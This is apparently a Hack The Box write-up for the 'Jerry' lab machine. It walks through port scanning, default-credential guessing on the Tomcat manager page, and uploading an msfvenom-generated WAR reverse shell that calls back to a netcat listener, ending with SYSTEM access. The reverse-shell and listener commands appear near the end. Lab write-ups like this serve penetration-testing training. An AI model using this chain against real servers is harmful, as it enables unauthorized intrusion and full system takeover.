Jerry HTB
IP
10.10.10.95Initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.95 | cut -d"/" -f1 | tr '\n' ','we can see we have the following port open on the target server
8080
Lets get some more details on this port
sudo nmap -sCV -p8080 10.10.10.95 -oA nmap_resultsreults
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
We can see apache tomcat is running on the target
version 7.0.88
Lets check it out
HTTP Port 8080
navigating to http://10.10.10.95:8080 we can confirm Apache Tomcat version 7.0.88 is indeed running
Let's see if we access the /manager directory
we are granted with a login request
we try the following
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
admin:tomcatBut no luck when but we are bought to this error page
we can see a set of credentials in the example window
tomcat: s3cretLets see if these work
and it does we are bought to the application manager
Since we can upload .war files we should be able to upload a reverse shell onto the target server and gain access
first lets generate a reverseshell to upload
msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f war -o shell.warstart a listener
rlwrap -cAr nc -lvnp 9001Now lets upload the file
Now when we navigate to `http://10.10.10.95:8080/shell`
we should have a hit on our listener
as you can see we are nt authority\system we owned the system
Last updated